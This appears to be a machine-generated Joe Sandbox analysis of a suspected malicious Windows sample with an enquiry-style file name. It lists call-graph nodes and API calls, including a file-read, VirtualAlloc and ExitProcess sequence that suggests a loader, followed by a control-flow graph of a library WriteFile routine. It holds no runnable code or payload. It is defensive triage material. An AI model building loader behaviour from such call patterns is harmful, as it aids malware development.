48 API calls 110020->110182 110021->109987 110021->109989 110021->109998 110021->110000 110021->110002 110021->110003 110021->110004 110021->110008 110021->110013 110021->110016 110021->110018 110021->110019 110021->110020 110021->110033 110180 ca3ee 48 API calls 110021->110180 110181 dede9 346 API calls 110021->110181 110186 ba599 InterlockedDecrement 110021->110186 110187 df4df 346 API calls 110021->110187 110023 f9a48 110025 f9a56 110023->110025 110026 f9a9b 110023->110026 110183 ca485 48 API calls 110025->110183 110029 f9a91 Mailbox 110026->110029 110184 cafce 48 API calls 110026->110184 110027 8fa40 346 API calls 110027->110033 110029->110027 110031 f9ad8 110185 9df08 48 API calls 110031->110185 110033->109226 110035 9469f 110034->110035 110036 94537 110034->110036 110039 8caee 48 API calls 110035->110039 110037 94543 110036->110037 110038 f7820 110036->110038 110241 94040 346 API calls _memmove 110037->110241 110242 de713 346 API calls Mailbox 110038->110242 110046 945e4 Mailbox 110039->110046 110042 f782c 110043 94639 Mailbox 110042->110043 110243 cd520 86 API calls 4 library calls 110042->110243 110043->109226 110045 94559 110045->110042 110045->110043 110045->110046 110047 83e39 84 API calls 110046->110047 110194 d01e4 110046->110194 110235 e0bfa 110046->110235 110238 9dd84 110046->110238 110047->110043 110051->109226 110435 8a9a0 110052->110435 110054 936e7 110055 93778 110054->110055 110056 fa269 110054->110056 110112 93aa8 110054->110112 110447 9bc04 86 API calls 110055->110447 110453 cd520 86 API calls 4 library calls 110056->110453 110061 fa3e9 110458 cd520 86 API calls 4 library calls 110061->110458 110062 93793 110062->110112 110114 9396b Mailbox _memmove 110062->110114 110116 fa68d 110062->110116 110440 810e8 110062->110440 110066 fa289 110066->110061 110070 8d2d2 53 API calls 110066->110070 110067 fa583 110069 8fa40 346 API calls 110067->110069 110068 fa45c 110462 cd520 86 API calls 4 library calls 110068->110462 110072 fa5b5 110069->110072 110073 fa2fb 110070->110073 110079 8d380 55 API calls 110072->110079 110072->110112 110075 fa40f 110073->110075 110076 fa303 110073->110076 110459 9cf79 49 API calls 110075->110459 110089 fa317 110076->110089 110098 fa341 110076->110098 110078 9384e 110082 fa60c 110078->110082 110083 938e5 110078->110083 110078->110114 110085 fa5e6 110079->110085 110468 cd231 50 API calls 110082->110468 110090 a010a 48 API calls 110083->110090 110467 cd520 86 API calls 4 library calls 110085->110467 110086 8fa40 346 API calls 110086->110114 110088 fa42c 110092 fa44d 110088->110092 110093 fa441 110088->110093 110454 cd520 86 API calls 4 library calls 110089->110454 110101 938ec 110090->110101 110091 9bc5c 48 API calls 110091->110114 110461 cd520 86 API calls 4 library calls 110092->110461 110460 cd520 86 API calls 4 library calls 110093->110460 110099 fa366 110098->110099 110103 fa384 110098->110103 110455 df211 346 API calls 110099->110455 110106 8e1f0 346 API calls 110101->110106 110109 9399f 110101->110109 110104 fa37a 110103->110104 110456 df4df 346 API calls 110103->110456 110104->110112 110457 9baef 48 API calls _memmove 110104->110457 110106->110114 110107 a010a 48 API calls 110107->110114 110110 8c935 48 API calls 110109->110110 110111 939c0 110109->110111 110110->110111 110111->110112 110115 fa65e 110111->110115 110119 93a05 110111->110119 110121 93ab5 Mailbox 110112->110121 110452 cd520 86 API calls 4 library calls 110112->110452 110114->110066 110114->110067 110114->110068 110114->110085 110114->110086 110114->110091 110114->110107 110114->110109 110114->110112 110449 8d500 53 API calls __cinit 110114->110449 110450 8d420 53 API calls 110114->110450 110451 9baef 48 API calls _memmove 110114->110451 110463 dd21a 82 API calls Mailbox 110114->110463 110464 c89e0 53 API calls 110114->110464 110465 8d772 55 API calls 110114->110465 110466 8d89e 50 API calls Mailbox 110114->110466 110469 8d89e 50 API calls Mailbox 110115->110469 110116->110112 110470 cd520 86 API calls 4 library calls 110116->110470 110118 93a95 110448 8d89e 50 API calls Mailbox 110118->110448 110119->110112 110119->110116 110119->110118 110121->109226 110122->109226 110123->109226 110124->109184 110125->109176 110126->109180 110127->109226 110128->109226 110129->109222 110130->109222 110131->109222 110133 8fa60 110132->110133 110169 8fa8e Mailbox _memmove 110132->110169 110135 a010a 48 API calls 110133->110135 110134 a1b2a 52 API calls __cinit 110134->110169 110135->110169 110136 9105e 110137 8c935 48 API calls 110136->110137 110152 8fbf1 Mailbox 110137->110152 110138 8d3d2 48 API calls 110138->110169 110139 90119 110530 cd520 86 API calls 4 library calls 110139->110530 110142 91063 110529 cd520 86 API calls 4 library calls 110142->110529 110144 90dee 110520 8d89e 50 API calls Mailbox 110144->110520 110146 fb772 110531 cd520 86 API calls 4 library calls 110146->110531 110147 90dfa 110521 8d89e 50 API calls Mailbox 110147->110521 110151 8c935 48 API calls 110151->110169 110152->109226 110153 ba599 InterlockedDecrement 110153->110169 110154 90e83 110157 8caee 48 API calls 110154->110157 110156 fb7d2 110165 910f1 Mailbox 110157->110165 110159 91230 110159->110152 110528 cd520 86 API calls 4 library calls 110159->110528 110162 a010a 48 API calls 110162->110169 110163 8fa40 346 API calls 110163->110169 110527 cd520 86 API calls 4 library calls 110165->110527 110167 fb583 110526 cd520 86 API calls 4 library calls 110167->110526 110169->110134 110169->110136 110169->110138 110169->110139 110169->110142 110169->110144 110169->110146 110169->110147 110169->110151 110169->110152 110169->110153 110169->110154 110169->110159 110169->110162 110169->110163 110169->110165 110169->110167 110472 e4e5b 110169->110472 110518 8f6d0 346 API calls 2 library calls 110169->110518 110519 91620 59 API calls Mailbox 110169->110519 110522 dee52 82 API calls 2 library calls 110169->110522 110523 def9d 90 API calls Mailbox 110169->110523 110524 cb020 48 API calls 110169->110524 110525 de713 346 API calls Mailbox 110169->110525 110171->109222 110172->109222 110173->109222 110174->109981 110175->109983 110176->109991 110177->110014 110178->110021 110179->110033 110180->110021 110181->110021 110182->110023 110183->110029 110184->110031 110185->110029 110186->110021 110187->110021 110188->110016 110189->110033 110190->110033 110191->110012 110192->110033 110193->110033 110195 d020d 110194->110195 110196 d0218 110194->110196 110305 8cdb4 48 API calls 110195->110305 110198 884a6 81 API calls 110196->110198 110199 d0232 110198->110199 110200 d033c 110199->110200 110201 d0254 110199->110201 110211 d0366 110199->110211 110202 83f9b 136 API calls 110200->110202 110203 884a6 81 API calls 110201->110203 110204 d034d 110202->110204 110209 d0260 _wcscpy _wcschr 110203->110209 110205 d0362 110204->110205 110207 83f9b 136 API calls 110204->110207 110206 884a6 81 API calls 110205->110206 110205->110211 110208 d039b 110206->110208 110207->110205 110210 a297d __wsplitpath 47 API calls 110208->110210 110214 d0284 _wcscat _wcscpy 110209->110214 110217 d02b2 _wcscat 110209->110217 110219 d03bf _wcscat _wcscpy 110210->110219 110211->110043 110212 884a6 81 API calls 110213 d02d0 _wcscpy 110212->110213 110306 c7c0c GetFileAttributesW 110213->110306 110215 884a6 81 API calls 110214->110215 110215->110217 110217->110212 110218 d02f0 __NMSG_WRITE 110218->110211 110220 884a6 81 API calls 110218->110220 110223 884a6 81 API calls 110219->110223 110221 d031c 110220->110221 110307 c6b3f 77 API calls 4 library calls 110221->110307 110225 d0456 110223->110225 110224 d0330 110224->110211 110244 c7334 110225->110244 110227 d0476 110228 9dd84 3 API calls 110227->110228 110229 d0485 110228->110229 110230 884a6 81 API calls 110229->110230 110233 d04b6 110229->110233 110231 d049f 110230->110231 110250 cc890 110231->110250 110234 83e39 84 API calls 110233->110234 110234->110211 110344 df79f 110235->110344 110237 e0c0a 110237->110043 110430 9dd92 GetFileAttributesW 110238->110430 110241->110045 110242->110042 110243->110043 110245 c7341 _wcschr __ftell_nolock 110244->110245 110246 a297d __wsplitpath 47 API calls 110245->110246 110249 c7357 _wcscat _wcscpy 110245->110249 110247 c7389 110246->110247 110248 a297d __wsplitpath 47 API calls 110247->110248 110248->110249 110249->110227 110251 cc89d __ftell_nolock 110250->110251 110252 a010a 48 API calls 110251->110252 110253 cc8fa 110252->110253 110254 84bce 48 API calls 110253->110254 110255 cc904 110254->110255 110256 cc6a0 GetSystemTimeAsFileTime 110255->110256 110257 cc90f 110256->110257 110258 841a7 83 API calls 110257->110258 110259 cc922 _wcscmp 110258->110259 110260 cc946 110259->110260 110261 cc9f3 110259->110261 110262 cce59 94 API calls 110260->110262 110263 cce59 94 API calls 110261->110263 110264 cc94b 110262->110264 110278 cc9bf _wcscat 110263->110278 110265 a297d __wsplitpath 47 API calls 110264->110265 110267 cc9fc 110264->110267 110270 cc974 _wcscat _wcscpy 110265->110270 110266 8417d 64 API calls 110268 cca18 110266->110268 110267->110233 110269 8417d 64 API calls 110268->110269 110271 cca28 110269->110271 110273 a297d __wsplitpath 47 API calls 110270->110273 110272 8417d 64 API calls 110271->110272 110274 cca43 110272->110274 110273->110278 110275 8417d 64 API calls 110274->110275 110276 cca53 110275->110276 110277 8417d 64 API calls 110276->110277 110279 cca6e 110277->110279 110278->110266 110278->110267 110280 8417d 64 API calls 110279->110280 110281 cca7e 110280->110281 110282 8417d 64 API calls 110281->110282 110283 cca8e 110282->110283 110284 8417d 64 API calls 110283->110284 110285 cca9e 110284->110285 110308 cd009 GetTempPathW GetTempFileNameW 110285->110308 110287 ccaaa 110288 a4129 117 API calls 110287->110288 110298 ccabb 110288->110298 110289 ccb75 110290 a4274 __fcloseall 83 API calls 110289->110290 110291 ccb80 110290->110291 110293 ccb9a 110291->110293 110294 ccb86 DeleteFileW 110291->110294 110292 8417d 64 API calls 110292->110298 110295 ccc2e CopyFileW 110293->110295 110300 ccba4 110293->110300 110294->110267 110296 ccc44 DeleteFileW 110295->110296 110297 ccc56 DeleteFileW 110295->110297 110296->110267 110322 ccfc8 CreateFileW 110297->110322 110298->110267 110298->110289 110298->110292 110309 a373e 110298->110309 110325 cc251 118 API calls __fcloseall 110300->110325 110303 ccc19 110303->110297 110304 ccc1d DeleteFileW 110303->110304 110304->110267 110305->110196 110306->110218 110307->110224 110308->110287 110310 a374a __fcloseall 110309->110310 110311 a377c 110310->110311 110312 a3764 110310->110312 110313 a3774 __fcloseall 110310->110313 110314 a5a9f __lock_file 48 API calls 110311->110314 110338 a889e 47 API calls __getptd_noexit 110312->110338 110313->110298 110317 a3782 110314->110317 110316 a3769 110339 a7aa0 8 API calls __mbstowcs_s_l 110316->110339 110326 a35e7 110317->110326 110323 ccfee SetFileTime CloseHandle 110322->110323 110324 cd004 110322->110324 110323->110324 110324->110267 110325->110303 110327 a3614 110326->110327 110329 a35f6 110326->110329 110340 a37b4 LeaveCriticalSection LeaveCriticalSection _fseek 110327->110340 110328 a3604 110341 a889e 47 API calls __getptd_noexit 110328->110341 110329->110327 110329->110328 110337 a362c _memmove 110329->110337 110331 a3609 110342 a7aa0 8 API calls __mbstowcs_s_l 110331->110342 110334 a3914 __flush 78 API calls 110334->110337 110335 a35c3 __ftell_nolock 47 API calls 110335->110337 110336 abd14 __flswbuf 78 API calls 110336->110337 110337->110327 110337->110334 110337->110335 110337->110336 110343 a9af3 78 API calls 5 library calls 110337->110343 110338->110316 110339->110313 110340->110313 110341->110331 110342->110327 110343->110337 110345 884a6 81 API calls 110344->110345 110346 df7db 110345->110346 110353 df81d Mailbox 110346->110353 110380 e0458 110346->110380 110348 dfa7c 110349 dfbeb 110348->110349 110350 dfa86 110348->110350 110416 e0579 89 API calls Mailbox 110349->110416 110393 df5fb 110350->110393 110353->110237 110354 df875 Mailbox 110354->110348 110354->110353 110356 884a6 81 API calls 110354->110356 110411 e28d9 48 API calls _memmove 110354->110411 110412 dfc96 60 API calls 2 library calls 110354->110412 110355 dfbf8 110355->110350 110357 dfc04 110355->110357 110356->110354 110357->110353 110362 dfaba 110407 9f92c 110362->110407 110365 dfaee 110368 83320 48 API calls 110365->110368 110366 dfad4 110413 cd520 86 API calls 4 library calls 110366->110413 110370 dfb05 110368->110370 110369 dfadf GetCurrentProcess TerminateProcess 110369->110365 110371 914a0 48 API calls 110370->110371 110379 dfb2f 110370->110379 110373 dfb1e 110371->110373 110372 dfc56 110372->110353 110376 dfc6f FreeLibrary 110372->110376 110414 e0300 105 API calls _free 110373->110414 110375 914a0 48 API calls 110375->110379 110376->110353 110379->110372 110379->110375 110415 8d89e 50 API calls Mailbox 110379->110415 110417 e0300 105 API calls _free 110379->110417 110381 8b8a7 48 API calls 110380->110381 110382 e0473 CharLowerBuffW 110381->110382 110418 d267a 110382->110418 110386 8d3d2 48 API calls 110387 e04ac 110386->110387 110425 87f40 48 API calls _memmove 110387->110425 110389 e04c3 110390 8a2fb 48 API calls 110389->110390 110391 e04cf Mailbox 110390->110391 110392 e050b Mailbox 110391->110392 110426 dfc96 60 API calls 2 library calls 110391->110426 110392->110354 110394 df616 110393->110394 110398 df66b 110393->110398 110395 a010a 48 API calls 110394->110395 110396 df638 110395->110396 110397 a010a 48 API calls 110396->110397 110396->110398 110397->110396 110399 e0719 110398->110399 110400 e0944 Mailbox 110399->110400 110406 e073c _strcat _wcscpy __NMSG_WRITE 110399->110406 110400->110362 110401 8d00b 58 API calls 110401->110406 110402 8cdb4 48 API calls 110402->110406 110403 884a6 81 API calls 110403->110406 110404 a45ec 47 API calls __crtGetStringTypeA_stat 110404->110406 110406->110400 110406->110401 110406->110402 110406->110403 110406->110404 110429 c8932 50 API calls __NMSG_WRITE 110406->110429 110409 9f941 110407->110409 110408 9f9d9 VirtualProtect 110410 9f9a7 110408->110410 110409->110408 110409->110410 110410->110365 110410->110366 110411->110354 110412->110354 110413->110369 110414->110379 110415->110379 110416->110355 110417->110379 110419 d26a4 __NMSG_WRITE 110418->110419 110420 d26e2 110419->110420 110421 d26d8 110419->110421 110424 d2763 110419->110424 110420->110386 110420->110391 110421->110420 110427 9dfd2 60 API calls 110421->110427 110424->110420 110428 9dfd2 60 API calls 110424->110428 110425->110389 110426->110392 110427->110421 110428->110424 110429->110406 110431 f4a7d FindFirstFileW 110430->110431 110432 9dd89 110430->110432 110433 f4a8e 110431->110433 110434 f4a95 FindClose 110431->110434 110432->110043 110433->110434 110436 8a9af 110435->110436 110439 8a9ca 110435->110439 110437 8b8a7 48 API calls 110436->110437 110438 8a9b7 CharUpperBuffW 110437->110438 110438->110439 110439->110054 110441 810f9 110440->110441 110442 f4c5a 110440->110442 110443 a010a 48 API calls 110441->110443 110444 81100 110443->110444 110445 81121 110444->110445 110471 8113c 48 API calls 110444->110471 110445->110078 110447->110062 110448->110112 110449->110114 110450->110114 110451->110114 110452->110121 110453->110062 110454->110112 110455->110104 110456->110104 110457->110061 110458->110112 110459->110088 110460->110112 110461->110112 110462->110112 110463->110114 110464->110114 110465->110114 110466->110114 110467->110112 110468->110109 110469->110116 110470->110112 110471->110445 110473 8d3d2 48 API calls 110472->110473 110474 e4e76 110473->110474 110475 884a6 81 API calls 110474->110475 110476 e4e85 110475->110476 110477 87b6e 48 API calls 110476->110477 110478 e4e94 110477->110478 110479 884a6 81 API calls 110478->110479 110480 e4ea4 110479->110480 110481 e4f2a 110480->110481 110482 e4ec7 110480->110482 110483 884a6 81 API calls 110481->110483 110532 8cdb4 48 API calls 110482->110532 110485 e4f2f 110483->110485 110488 884a6 81 API calls 110485->110488 110486 e4ecc 110487 e4f57 110486->110487 110490 e4ee3 110486->110490 110535 8ca8e 48 API calls 110487->110535 110491 e4f49 110488->110491 110533 87f40 48 API calls _memmove 110490->110533 110491->110487 110493 e4f79 110491->110493 110495 e4f8f 110493->110495 110536 8cdb4 48 API calls 110493->110536 110494 e4ef0 110496 87b4b 48 API calls 110494->110496 110498 e4fa8 110495->110498 110537 8cdb4 48 API calls 110495->110537 110499 e4efe 110496->110499 110501 d267a 60 API calls 110498->110501 110513 e4fdd 110498->110513 110534 87f40 48 API calls _memmove 110499->110534 110503 e4fd7 110501->110503 110503->110513 110538 87f40 48 API calls _memmove 110503->110538 110504 e4f17 110506 87b4b 48 API calls 110504->110506 110505 e4f64 Mailbox 110505->110169 110517 e4f25 110506->110517 110507 d267a 60 API calls 110507->110513 110509 e5063 110540 87f40 48 API calls _memmove 110509->110540 110513->110507 110513->110509 110515 87b4b 48 API calls 110513->110515 110539 87f40 48 API calls _memmove 110513->110539 110514 e507e 110516 87b4b 48 API calls 110514->110516 110515->110513 110516->110517 110541 87bef 48 API calls 110517->110541 110518->110169 110519->110169 110520->110147 110521->110154 110522->110169 110523->110169 110524->110169 110525->110169 110526->110165 110527->110152 110528->110142 110529->110139 110530->110146 110531->110156 110532->110486 110533->110494 110534->110504 110535->110505 110536->110495 110537->110498 110538->110513 110539->110513 110540->110514 110541->110505 110542 829c2 110543 829cb 110542->110543 110544 82a48 110543->110544 110545 829e9 110543->110545 110581 82a46 110543->110581 110549 82a4e 110544->110549 110550 f2307 110544->110550 110546 82aac PostQuitMessage 110545->110546 110547 829f6 110545->110547 110584 82a39 110546->110584 110552 f238f 110547->110552 110553 82a01 110547->110553 110548 82a2b DefWindowProcW 110548->110584 110554 82a53 110549->110554 110555 82a76 SetTimer RegisterWindowMessageW 110549->110555 110591 8322e 16 API calls 110550->110591 110596 c57fb 60 API calls _memset 110552->110596 110557 82a09 110553->110557 110558 82ab6 110553->110558 110561 82a5a KillTimer 110554->110561 110562 f22aa 110554->110562 110559 82a9f CreatePopupMenu 110555->110559 110555->110584 110556 f232e 110592 9ec33 346 API calls Mailbox 110556->110592 110564 f2374 110557->110564 110565 82a14 110557->110565 110589 81e58 53 API calls _memset 110558->110589 110559->110584 110587 82b94 Shell_NotifyIconW _memset 110561->110587 110568 f22af 110562->110568 110569 f22e3 MoveWindow 110562->110569 110564->110548 110595 bb31f 48 API calls 110564->110595 110571 82a1f 110565->110571 110572 f235f 110565->110572 110566 f23a1 110566->110548 110566->110584 110574 f22b3 110568->110574 110575 f22d2 SetFocus 110568->110575 110569->110584 110571->110548 110593 82b94 Shell_NotifyIconW _memset 110571->110593 110594 c5fdb 70 API calls _memset 110572->110594 110573 82ac5 110573->110584 110574->110571 110579 f22bc 110574->110579 110575->110584 110576 82a6d 110588 82ac7 DeleteObject DestroyWindow Mailbox 110576->110588 110590 8322e 16 API calls 110579->110590 110581->110548 110585 f2353 110586 83598 67 API calls 110585->110586 110586->110581 110587->110576 110588->110584 110589->110573 110590->110584 110591->110556 110592->110571 110593->110585 110594->110573 110595->110581 110596->110566 110597 91118 110645 9e016 110597->110645 110599 9112e 110600 91148 110599->110600 110601 fabeb 110599->110601 110603 93680 346 API calls 110600->110603 110662 9cf79 49 API calls 110601->110662 110633 8fad8 Mailbox _memmove 110603->110633 110605 fb628 Mailbox 110606 fac2a 110608 fac4a Mailbox 110606->110608 110663 cba5d 48 API calls 110606->110663 110666 cd520 86 API calls 4 library calls 110608->110666 110609 91230 110629 8fbf1 Mailbox 110609->110629 110667 cd520 86 API calls 4 library calls 110609->110667 110610 90119 110669 cd520 86 API calls 4 library calls 110610->110669 110611 a010a 48 API calls 110611->110633 110614 9105e 110620 8c935 48 API calls 110614->110620 110615 91063 110668 cd520 86 API calls 4 library calls 110615->110668 110617 90dee 110656 8d89e 50 API calls Mailbox 110617->110656 110619 fb772 110670 cd520 86 API calls 4 library calls 110619->110670 110620->110629 110621 90dfa 110657 8d89e 50 API calls Mailbox 110621->110657 110625 8c935 48 API calls 110625->110633 110626 90e83 110634 8caee 48 API calls 110626->110634 110627 ba599 InterlockedDecrement 110627->110633 110628 8d3d2 48 API calls 110628->110633 110631 a1b2a 52 API calls __cinit 110631->110633 110632 fb7d2 110633->110609 110633->110610 110633->110611 110633->110614 110633->110615 110633->110617 110633->110619 110633->110621 110633->110625 110633->110626 110633->110627 110633->110628 110633->110629 110633->110631 110638 8fa40 346 API calls 110633->110638 110640 910f1 Mailbox 110633->110640 110642 fb583 110633->110642 110644 e4e5b 84 API calls 110633->110644 110654 8f6d0 346 API calls 2 library calls 110633->110654 110655 91620 59 API calls Mailbox 110633->110655 110658 dee52 82 API calls 2 library calls 110633->110658 110659 def9d 90 API calls Mailbox 110633->110659 110660 cb020 48 API calls 110633->110660 110661 de713 346 API calls Mailbox 110633->110661 110634->110640 110638->110633 110665 cd520 86 API calls 4 library calls 110640->110665 110664 cd520 86 API calls 4 library calls 110642->110664 110644->110633 110646 9e022 110645->110646 110647 9e034 110645->110647 110671 8d89e 50 API calls Mailbox 110646->110671 110649 9e03a 110647->110649 110650 9e063 110647->110650 110651 a010a 48 API calls 110649->110651 110672 8d89e 50 API calls Mailbox 110650->110672 110653 9e02c 110651->110653 110653->110599 110654->110633 110655->110633 110656->110621 110657->110626 110658->110633 110659->110633 110660->110633 110661->110633 110662->110606 110663->110608 110664->110640 110665->110629 110666->110605 110667->110615 110668->110610 110669->110619 110670->110632 110671->110653 110672->110653 110673 8e85b 110676 8d937 110673->110676 110675 8e865 110677 8d94f 110676->110677 110684 8d9a7 110676->110684 110678 8fa40 346 API calls 110677->110678 110677->110684 110682 8d986 110678->110682 110680 f979b 110680->110675 110681 8d9d0 110681->110675 110682->110681 110685 8d89e 50 API calls Mailbox 110682->110685 110684->110681 110686 cd520 86 API calls 4 library calls 110684->110686 110685->110684 110686->110680 110687 f1edb 110692 8131c 110687->110692 110689 f1ee1 110725 a1b2a 52 API calls __cinit 110689->110725 110691 f1eeb 110693 8133e 110692->110693 110726 81624 110693->110726 110698 8d3d2 48 API calls 110699 8137e 110698->110699 110700 8d3d2 48 API calls 110699->110700 110701 81388 110700->110701 110702 8d3d2 48 API calls 110701->110702 110703 81392 110702->110703 110704 8d3d2 48 API calls 110703->110704 110705 813d8 110704->110705 110706 8d3d2 48 API calls 110705->110706 110707 814bb 110706->110707 110734 81673 110707->110734 110711 814eb 110712 8d3d2 48 API calls 110711->110712 110713 814f5 110712->110713 110763 8175e 110713->110763 110715 81540 110716 81550 GetStdHandle 110715->110716 110717 815ab 110716->110717 110718 f58da 110716->110718 110719 815b1 CoInitialize 110717->110719 110718->110717 110720 f58e3 110718->110720 110719->110689 110770 c9bd1 53 API calls 110720->110770 110722 f58ea 110771 ca2f6 CreateThread 110722->110771 110724 f58f6 CloseHandle 110724->110719 110725->110691 110772 817e0 110726->110772 110729 87e53 48 API calls 110730 81344 110729->110730 110731 816db 110730->110731 110786 81867 6 API calls 110731->110786 110733 81374 110733->110698 110735 8d3d2 48 API calls 110734->110735 110736 81683 110735->110736 110737 8d3d2 48 API calls 110736->110737 110738 8168b 110737->110738 110787 87d70 110738->110787 110741 87d70 48 API calls 110742 8169b 110741->110742 110743 8d3d2 48 API calls 110742->110743 110744 816a6 110743->110744 110745 a010a 48 API calls 110744->110745 110746 814c5 110745->110746 110747 816f2 110746->110747 110748 81700 110747->110748 110749 8d3d2 48 API calls 110748->110749 110750 8170b 110749->110750 110751 8d3d2 48 API calls 110750->110751 110752 81716 110751->110752 110753 8d3d2 48 API calls 110752->110753 110754 81721 110753->110754 110755 8d3d2 48 API calls 110754->110755 110756 8172c 110755->110756 110757 87d70 48 API calls 110756->110757 110758 81737 110757->110758 110759 a010a 48 API calls 110758->110759 110760 8173e 110759->110760 110761 f24a6 110760->110761 110762 81747 RegisterWindowMessageW 110760->110762 110762->110711 110764 f67dd 110763->110764 110765 8176e 110763->110765 110792 cd231 50 API calls 110764->110792 110767 a010a 48 API calls 110765->110767 110769 81776 110767->110769 110768 f67e8 110769->110715 110770->110722 110771->110724 110793 ca2dc 54 API calls 110771->110793 110779 817fc 110772->110779 110775 817fc 48 API calls 110776 817f0 110775->110776 110777 8d3d2 48 API calls 110776->110777 110778 8165b 110777->110778 110778->110729 110780 8d3d2 48 API calls 110779->110780 110781 81807 110780->110781 110782 8d3d2 48 API calls 110781->110782 110783 8180f 110782->110783 110784 8d3d2 48 API calls 110783->110784 110785 817e8 110784->110785 110785->110775 110786->110733 110788 8d3d2 48 API calls 110787->110788 110789 87d79 110788->110789 110790 8d3d2 48 API calls 110789->110790 110791 81693 110790->110791 110791->110741 110792->110768 110794 cc450 110795 cc45d 110794->110795 110797 cc463 110794->110797 110796 a28ca _free 47 API calls 110795->110796 110796->110797 110798 cc474 110797->110798 110800 a28ca _free 47 API calls 110797->110800 110799 cc486 110798->110799 110801 a28ca _free 47 API calls 110798->110801 110800->110798 110801->110799 110802 a51d58 110803 a4f9a8 GetPEB 110802->110803 110804 a51e41 110803->110804 110816 a51c48 110804->110816 110806 a51e6a CreateFileW 110808 a51ebe 110806->110808 110809 a51eb9 110806->110809 110808->110809 110810 a51ed5 VirtualAlloc 110808->110810 110810->110809 110811 a51ef3 ReadFile 110810->110811 110811->110809 110812 a51f0e 110811->110812 110813 a50c48 13 API calls 110812->110813 110814 a51f41 110813->110814 110815 a51f64 ExitProcess 110814->110815 110815->110809 110817 a51c51 Sleep 110816->110817 110818 a51c5f 110817->110818

                            Executed Functions

                            Function 000ABDF6 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 641 abdf6-abe33 call b0650 644 abe3c-abe3e 641->644 645 abe35-abe37 641->645 647 abe5f-abe8c 644->647 648 abe40-abe5a call a886a call a889e call a7aa0 644->648 646 ac613-ac61f call ab4bf 645->646 649 abe8e-abe91 647->649 650 abe93-abe9a 647->650 648->646 649->650 653 abebe-abec3 649->653 654 abeb8 650->654 655 abe9c-abeb3 call a886a call a889e call a7aa0 650->655 659 abed2-abee0 call b49a2 653->659 660 abec5-abecf call b05df 653->660 654->653 690 ac604-ac607 655->690 671 ac1fe-ac210 659->671 672 abee6-abef8 659->672 660->659 675 ac56b-ac588 WriteFile 671->675 676 ac216-ac226 671->676 672->671 674 abefe-abf36 call a869d GetConsoleMode 672->674 674->671 694 abf3c-abf42 674->694 682 ac58a-ac592 675->682 683 ac594-ac59a GetLastError 675->683 679 ac22c-ac237 676->679 680 ac30d-ac312 676->680 688 ac5ce-ac5e6 679->688 689 ac23d-ac24d 679->689 685 ac318-ac321 680->685 686 ac416-ac421 680->686 684 ac59c 682->684 683->684 691 ac5a2-ac5a4 684->691 685->688 692 ac327 685->692 686->688 698 ac427 686->698 696 ac5e8-ac5eb 688->696 697 ac5f1-ac601 call a889e call a886a 688->697 695 ac253-ac256 689->695 693 ac611-ac612 690->693 700 ac609-ac60f 691->700 701 ac5a6-ac5a8 691->701 702 ac331-ac348 692->702 693->646 703 abf4c-abf6f GetConsoleCP 694->703 704 abf44-abf46 694->704 705 ac258-ac271 695->705 706 ac29c-ac2d3 WriteFile 695->706 696->697 707 ac5ed-ac5ef 696->707 697->690 708 ac431-ac446 698->708 700->693 701->688 711 ac5aa-ac5af 701->711 712 ac34e-ac351 702->712 713 ac1f3-ac1f9 703->713 714 abf75-abf7d 703->714 704->671 704->703 715 ac27e-ac29a 705->715 716 ac273-ac27d 705->716 706->683 717 ac2d9-ac2eb 706->717 707->693 709 ac44c-ac44e 708->709 718 ac48b-ac4cc WideCharToMultiByte 709->718 719 ac450-ac466 709->719 721 ac5b1-ac5c3 call a889e call a886a 711->721 722 ac5c5-ac5cc call a887d 711->722 723 ac353-ac369 712->723 724 ac391-ac3da WriteFile 712->724 713->701 725 abf87-abf89 714->725 715->695 715->706 716->715 717->691 726 ac2f1-ac302 717->726 718->683 731 ac4d2-ac4d4 718->731 728 ac47a-ac489 719->728 729 ac468-ac477 719->729 721->690 722->690 733 ac36b-ac37d 723->733 734 ac380-ac38f 723->734 724->683 736 ac3e0-ac3f8 724->736 737 ac11e-ac121 725->737 738 abf8f-abfb1 725->738 726->689 727 ac308 726->727 727->691 728->709 728->718 729->728 741 ac4da-ac50d WriteFile 731->741 733->734 734->712 734->724 736->691 744 ac3fe-ac40b 736->744 739 ac128-ac155 737->739 740 ac123-ac126 737->740 745 abfca-abfd6 call a22a8 738->745 746 abfb3-abfc8 738->746 747 ac15b-ac15e 739->747 740->739 740->747 748 ac50f-ac529 741->748 749 ac52d-ac541 GetLastError 741->749 744->702 751 ac411 744->751 761 abfd8-abfec 745->761 762 ac01c-ac01e 745->762 752 ac024-ac036 call b4ea7 746->752 755 ac160-ac163 747->755 756 ac165-ac178 call b6634 747->756 748->741 757 ac52b 748->757 760 ac547-ac549 749->760 751->691 771 ac1e8-ac1ee 752->771 772 ac03c 752->772 755->756 763 ac1ba-ac1bd 755->763 756->683 775 ac17e-ac188 756->775 757->760 760->684 766 ac54b-ac563 760->766 768 abff2-ac007 call b4ea7 761->768 769 ac1c5-ac1e0 761->769 762->752 763->725 767 ac1c3 763->767 766->708 773 ac569 766->773 767->771 768->771 781 ac00d-ac01a 768->781 769->771 771->684 776 ac042-ac077 WideCharToMultiByte 772->776 773->691 778 ac18a-ac1a1 call b6634 775->778 779 ac1ae-ac1b4 775->779 776->771 780 ac07d-ac0a3 WriteFile 776->780 778->683 786 ac1a7-ac1a8 778->786 779->763 780->683 783 ac0a9-ac0c1 780->783 781->776 783->771 785 ac0c7-ac0ce 783->785 785->779 787 ac0d4-ac0ff WriteFile 785->787 786->779 787->683 788 ac105-ac10c 787->788 788->771 789 ac112-ac119 788->789 789->779
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d6b8a0424962131512bece74feedde033fc7021fba475b674d5e9915af5efedb
